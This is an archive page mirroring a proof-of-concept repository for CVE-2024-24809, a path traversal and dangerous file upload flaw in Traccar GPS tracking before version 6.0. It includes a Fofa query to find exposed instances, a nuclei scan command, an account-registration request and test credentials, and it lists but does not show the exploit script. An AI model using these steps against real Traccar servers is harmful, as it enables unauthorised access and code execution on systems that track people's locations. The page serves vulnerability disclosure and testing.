Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-24809 PoC — Traccar vulnerable to Path Traversal: 'dir/../../filename' and Unrestricted Upload of File with Dangerous Type

Source
https://github.com/fa-rrel/CVE-2024-24809-Proof-of-concept
Associated Vulnerability
Title:Traccar vulnerable to Path Traversal: 'dir/../../filename' and Unrestricted Upload of File with Dangerous Type (CVE-2024-24809)
Description:Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.
Description
Critical Flaws in Traccar GPS System Expose Users to Remote Attacks
Readme
### CVE-2024-24809 Detail

#Description
Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. 
Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under 
any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.

#usage
```bash
Fofa query : app="traccar"
```
```bash
nuclei --target {target.com} -t CVE-2024-24809.yaml
```
#Proof of concept (using burpsuite)
```bash
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8

{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
```
#Testing account
```bash
name: "ghostsec"
password: "ghostsec"
email: "ghostsec@ghostsec.com"
```

### How to fix?
Upgrade org.traccar:traccar to version 6.0 or higher.
File Snapshot

 [4.0K]  /data/pocs/9115e8ebdf46fa8174deb81d096f5561d90a4256
├── [4.4K]  CVE-2024-24809.yaml
├── [3.8K]  poc.py
└── [1.1K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →